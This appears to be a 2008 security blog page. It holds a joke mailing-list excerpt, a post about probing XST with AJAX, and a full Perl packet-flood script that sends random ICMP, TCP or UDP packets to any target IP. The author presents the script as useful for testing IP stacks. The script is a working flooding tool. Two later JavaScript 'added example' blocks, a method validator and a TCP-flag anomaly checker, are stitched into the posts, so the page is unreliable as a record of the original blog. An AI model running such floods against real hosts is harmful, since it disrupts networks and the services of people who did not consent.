20 November 2008

full disclosure just blew past my lunacy limit

from this thread on the list:


From: n3td3v
Date: Thu, 20 Nov 2008 20:27:01 +0000

n3td3v is real

On Thu, Nov 20, 2008 at 8:23 PM, wrote:
> The mustache respectfully disagrees with you, for
> the very first time.
>
> - -al
>
>
> On Thu, 20 Nov 2008 15:17:24 -0500 n3td3v
> wrote:
>>
>> im not a sock puppet im real.
>>
>> On Thu, Nov 20, 2008 at 8:16 PM,
>> wrote:
>>> *Two* sock puppets, and a dumb *old* guy
>>> with an unkempt mustache.

19 November 2008

AJAX Fun

A little snippet of code I'm playing with. This started as me learning more about XST, to understand why TRACE being enabled was considered a BadThing(tm). [see: this white paper (.pdf format) for more on that].

In my opinion, the best way to learn is to do, so I quickly whipped up the following so I could play, and handily, this finally gives me a good reason to write my first bit of AJAX even =)

A couple of points:

  • If you change the method from GET to HEAD, this makes a handy banner grabber

  • If you change the method to TRACE, it may or may not work, depending on the browser you are using.



To explain the latter item:

The current versions of both Firefox and IE refuse to run TRACE via XMLHttpRequest.
This is the correct behaviour, per the spec, and is certainly more secure (it goes a fair way to mitigate XST in general in fact). I have not tried older versions or other browsers to see how they handle it.
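The method check that XMLHttpRequest.open() performs under the current XHR/Fetch specifications, next to a weak exact-match check, as an added example (not the code from the pastebin or from any browser). The function names and the sample method list are assumptions made for illustration.

```javascript
// Added example: method validation modelled on XMLHttpRequest.open().
// Forbidden methods and the normalised set are the ones the XHR/Fetch specs list.
const FORBIDDEN = new Set(["CONNECT", "TRACE", "TRACK"]);
const NORMALIZED = new Set(["DELETE", "GET", "HEAD", "OPTIONS", "POST", "PUT"]);
// RFC 7230 "token": the only characters allowed in a method name.
const TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

// Weak check (hypothetical): exact comparison, so "trace" or "TrAcK" passes.
function naiveIsAllowed(method) {
  return method !== "TRACE";
}

// Spec-style check: returns the method that would be sent, or throws an
// error named like the DOMException open() raises.
function checkXhrMethod(method) {
  const m = String(method);
  if (!TOKEN.test(m)) {
    const e = new Error(`"${m}" is not a valid HTTP method token`);
    e.name = "SyntaxError";
    throw e;
  }
  const upper = m.toUpperCase();
  if (FORBIDDEN.has(upper)) {
    const e = new Error(`method ${upper} is forbidden for XMLHttpRequest`);
    e.name = "SecurityError";
    throw e;
  }
  // Only the six common methods are upper-cased; others are sent as given.
  return NORMALIZED.has(upper) ? upper : m;
}

// Run each method through both checks and collect the outcomes.
function compare(methods) {
  return methods.map((method) => {
    let spec;
    try {
      spec = checkXhrMethod(method);
    } catch (e) {
      spec = e.name;
    }
    return { method, naive: naiveIsAllowed(method), spec };
  });
}

// Constructed sample input.
const SAMPLE = ["get", "HEAD", "TRACE", "trace", "TrAcK", "PROPFIND", "GET /"];
console.table(compare(SAMPLE));
```

The comparison is case-insensitive in the spec, which is the part an exact-match filter gets wrong.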


Note that I snarfed bits and pieces of this code from various places on the net, and didn't create all of this from scratch. However, I have tweaked and changed things enough to feel OK calling this "my code".

I'll probably tweak this further. I'm considering just making different buttons for the different types of requests and letting the function figure out what method to use based on that, for example.

Anyway, here's the code as it stands after about 20 minutes of crash course in AJAX:

[EDIT:
if anyone knows how to post HTML/Javascript to blogspot, I'd be grateful for the tip, it keeps trying to render regardless of my use of pre or code. I even tried to settle for textarea, but it borked the formatting of the code unfortunately and added br tags all over the place. *sigh*. ]

Here's a pastebin of the code instead

[EDIT 2010-03-02:
Oh for ... Apparently IE8 renders the pastebin code as HTML instead of displaying it as text/plain. *cry*. ]

04 November 2008

Packet Flooder Script

I considered for a while whether or not to post this here.
Ultimately I decided to go ahead and do it for a couple of reasons:

1. This isn't anything special, there are myriad similar (or better) tools out there that do the same thing.
2. It is actually useful for testing IP stacks on various devices.

And so, here it is, a perl based packet flood script.
It's got a few things that make it interesting:

1. Ports are chosen randomly for TCP and UDP.
2. ICMP type codes are chosen randomly.
3. TCP flags are chosen randomly.
4. The fragment bit is un/set randomly.



#!/usr/bin/perl -w
# =================================================
# simple network flooder script
# takes type of flood (icmp, tcp, udp) as param
# optionally takes dest ip and packet count
# =================================================
my $VERSION = 0.5;
# =================================================
use strict;
use Net::RawIP;

my $flood = shift or &usage();
my $dstip = shift || '127.0.0.1';
my $pktct = shift || 100;

&icmpflood($dstip, $pktct) if $flood =~ 'icmp';
&tcpflood($dstip, $pktct) if $flood =~ 'tcp';
&udpflood($dstip, $pktct) if $flood =~ 'udp';

sub icmpflood() {
my($dstip, $pktct, $code, $type, $frag);
$dstip = shift;
$pktct = shift;

print "\nstarting flood to $dstip\n";
# send exactly $pktct packets
for(my $i=0; $i < $pktct; $i++) {

$code = int(rand(255));
$type = int(rand(255));
$frag = int(rand(2));

my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
icmp => {
code => $code,
type => $type,
}
});

$packet->send;
print "sent icmp $type->$code, frag: $frag\n";
}
print "\nflood complete\n\n";
}

sub tcpflood() {
my($dstip, $pktct, $sport, $dport, $frag, $urg, $psh, $rst, $fin,
$syn, $ack);
$dstip = shift;
$pktct = shift;
print "\nstarting flood to $dstip\n";
# send exactly $pktct packets
for(my $i=0; $i < $pktct; $i++) {

$sport = int(rand(65535));
$dport = int(rand(65535));
$frag = int(rand(2));
$urg = int(rand(2));
$psh = int(rand(2));
$rst = int(rand(2));
$fin = int(rand(2));
$syn = int(rand(2));
$ack = int(rand(2));

my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
tcp => {
source => $sport,
dest => $dport,
urg => $urg,
psh => $psh,
rst => $rst,
fin => $fin,
syn => $syn,
ack => $ack,
}
});

$packet->send;
print "sent tcp packet from $sport to $dport, frag: $frag, psh: $psh, rst: $rst, fin: $fin, syn: $syn, ack: $ack\n";
}
print "\nflood complete\n\n";
}

sub udpflood() {
my($dstip, $pktct, $sport, $dport, $frag);
$dstip = shift;
$pktct = shift;

print "\nstarting flood to $dstip\n";
# send exactly $pktct packets
for(my $i=0; $i < $pktct; $i++) {

$sport = int(rand(255));
$dport = int(rand(255));
$frag = int(rand(2));

my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
udp => {
source => $sport,
dest => $dport,
}
});

$packet->send;
print "sent udp packet from $sport to $dport, frag: $frag\n";
}
print "\nflood complete\n\n";
}

sub usage() {
print "
need to set a valid flood type (one of icmp, tcp, udp)
optionally set dest ip and packetcount

example:

$0 [tcp udp icmp] \n\n";
exit 0;
}
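
Because the script picks each TCP flag with an independent coin flip, most of what it sends carries a flag combination a normal stack never emits, which is what a device under test (or an IDS watching it) should notice. The following is an added example, not part of the original script: the rule set in flagAnomaly is an assumed, simplified heuristic, and the sample segments are constructed.

```javascript
// Added example: classify TCP flag combinations and measure how much of the
// script's random-flag traffic a simple sanity check would flag.
const FLAG_NAMES = ["urg", "ack", "psh", "rst", "syn", "fin"];

// Returns a reason string for an anomalous combination, or null if plausible.
// Assumed heuristic rules, not a complete validity test.
function flagAnomaly(f) {
  if (!FLAG_NAMES.some((name) => f[name])) return "no flags set";
  if (f.syn && f.fin) return "SYN+FIN";
  if (f.syn && f.rst) return "SYN+RST";
  if (f.rst && f.fin) return "RST+FIN";
  // Outside the initial SYN and resets, every segment carries ACK.
  if (!f.ack && !f.syn && !f.rst) return "missing ACK";
  return null;
}

// Enumerate all 64 combinations; int(rand(2)) per flag makes them equally likely.
function anomalyStats() {
  const reasons = {};
  let flagged = 0;
  for (let bits = 0; bits < 64; bits++) {
    const f = {};
    FLAG_NAMES.forEach((name, i) => { f[name] = (bits >> i) & 1; });
    const reason = flagAnomaly(f);
    if (reason) {
      flagged++;
      reasons[reason] = (reasons[reason] || 0) + 1;
    }
  }
  return { total: 64, flagged, ratio: flagged / 64, reasons };
}

// Constructed sample segments, as a sensor might decode them.
const SAMPLE = [
  { urg: 0, ack: 0, psh: 0, rst: 0, syn: 1, fin: 0 }, // plain SYN
  { urg: 0, ack: 1, psh: 1, rst: 0, syn: 0, fin: 0 }, // data segment
  { urg: 1, ack: 0, psh: 1, rst: 0, syn: 0, fin: 1 }, // FIN+PSH+URG, no ACK
  { urg: 0, ack: 1, psh: 0, rst: 1, syn: 1, fin: 0 }, // SYN+RST
];
for (const seg of SAMPLE) {
  console.log(JSON.stringify(seg), "->", flagAnomaly(seg) || "ok");
}
console.log(anomalyStats());
```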